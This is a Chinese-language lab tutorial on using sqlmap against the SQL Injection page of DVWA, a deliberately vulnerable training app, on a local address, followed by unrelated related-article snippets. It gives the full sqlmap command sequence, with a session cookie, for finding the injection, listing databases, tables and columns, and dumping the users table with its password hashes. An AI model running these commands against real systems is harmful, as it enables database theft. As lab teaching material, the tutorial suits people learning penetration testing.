1 使用sqlmap注入DVWA的SQL Injection菜单

本教程中的登陆地址:http://192.168.0.112/dvwa/login.php

1.1 获取cookie信息

1) 使用admin/password登陆系统,通过firebug工具获取cookie信息。

得到的cookie信息如下:

security=low; path=/dvwa/; domain=192.168.0.112

PHPSESSID=0bec860709d15f590768b7713c69b52f; path=/; domain=192.168.0.112

2) 获取要测试的url

点击SQL Injection菜单,在User ID输入框内输入aa,点击submit按钮。通过firebug工具获取待测试的url如下: http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#

3) 使用sqlmap测试该url是否存在sql注入漏洞

执行如下命令: root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f'

4) 探测MYSQL中用来存放应用数据的数据库名称

执行如下命令:root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' --dbs -v 0

5) 查询出dvwa数据库中存在的表名

执行如下命令:root@Kali-Linux:~# root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' -D dvwa --tables

6) 得到users表中的字段列表

执行如下命令:root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' -D dvwa --tables -T users --columns

7) 导出users表

执行如下命令:root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' -D dvwa --tables -T users --columns --dump

一路y下来,竟然来数据库中的密文密码也给破译了。。

根据提示路径下载users.csv即可

使用sqlmap注入DVWA的SQL Injection菜单的更多相关文章

  1. 【DVWA】SQL Injection(SQL 注入)通关教程

    日期:2019-07-28 20:43:48 更新: 作者:Bay0net 介绍: 0x00.基本信息 关于 mysql 相关的注入,传送门. SQL 注入漏洞之 mysql - Bay0net - ...

  2. DVWA之SQL Injection

    SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害是巨大的,常常 ...

  3. DVWA之 SQL Injection(Blind)

    SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法 ...

  4. [SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

    FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION 这里先介绍一下POSTGRESQL.这是一款数据库管理系统,与oracle是同类型软件.08年左右的市场 ...

  5. [SQL注入1]From SQL injection to Shell

    第一次写,希望大神们多指点. 对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习.网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTE ...

  6. Sqlmap对dvwa进行sql注入测试

    前提准备条件: 1.下载安装dvwa,下载链接地址:http://www.dvwa.co.uk/.2.需要安装python运行环境.3.下载sqlmap包并将其解压. 一.查看所有的数据库;(其中db ...

  7. DVWA(三):SQL injection 全等级SQL注入

    (本文不定期更新) 一.所需环境: 1.DVWA 2.web环境 phpstudy/wamp 3.burp suite 二.SQL注入产生的原因: 程序员在编写代码的时候,没有对用户输入数据的合法性进 ...

  8. DVWA SQL Injection 通关教程

    SQL Injection,即SQL注入,SQLi,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害巨大,常常会导致整个数据库被“脱 ...

  9. [SQL SERVER系列]读书笔记之SQL注入漏洞和SQL调优

    最近读了程序员的SQL金典这本书,觉得里面的SQL注入漏洞和SQL调优总结得不错,下面简单讨论下SQL注入漏洞和SQL调优. 1. SQL注入漏洞 由于“'1'='1'”这个表达式永远返回 true, ...

随机推荐

  1. [一]java环境变量的配置

    1.JAVA_HOME(新建):D:\jdk1.6 2.classpath(新建): .;%JAVA_HOME%\lib;%JAVA_HOME%\lib\tools.jar; 3.path(新增):% ...

  2. jQuery的DOM操作小案例

    案例一:下拉列表左右选择 <body> <div> <select style="width:60px" multiple size="10 ...

  3. iOS-iPhone系统版本号-iPhone App版本号

    转载: http://blog.sina.com.cn/s/blog_7b9d64af0101bu9j.html 很多时候,我们需要获得用户iPhone版本号,或者App的当前版本号. 关心以下两个方 ...

  4. js、jQuery操作input大全 不断完善

    工作中经常用到的,不断更新中... jquery获取单选按钮的值:$("input[name='stageName']:checked").val(); 删除select某几个op ...

  5. [OGRE]基础教程来七发:来谈一谈缓冲绑定

    上一章我们处理监听的方案是,每一帧只处理一次. 这一次,当鼠标键盘的事件发生时,我们会立即处理它. 这里只是对缓冲输入的一个简单介绍,而不是完整的如何使用OIS的教程. 若想了解更多内容,请查阅相关的 ...

  6. stl之deque双端队列容器

    deque与vector很相似,不仅能够在尾部插入和删除元素,还能够在头部插入和删除. 只是当考虑到容器元素的内存分配策略和操作性能时.deque相对vector较为有优势. 头文件 #include ...

  7. cocoapods使用指南

    什么是cocoapods cocoapods是库管理工具. cocoapods的用途 解决库之间的依赖关系.如前文所述: 一个开源的项目可能是另一个项目的基础, A依赖B, B依赖C和D, D又依赖E ...

  8. Android_life,Intent_note

    生命周期: 从出生到死亡 Activity生命周期的7个方法和3个循环 onCreate() 创建时调用onRestart() 不可见到可见时调用onStart() 用户可见时调用onResume() ...

  9. git对象存储

    之前提到当存储数据内容时,会在objects文件夹下存储一个git对象.我们花些时间来看看 Git 是如何存储对象的.你将看来如何通过 Ruby 脚本语言存储一个 blob 对象 ,有必要了解一下对象 ...

  10. js验证

    验证短日期(2007-06-05) function strDateTime(str) {    var r = str.match(/^(\d{1,4})(-|\/)(\d{1,2})\2(\d{1 ...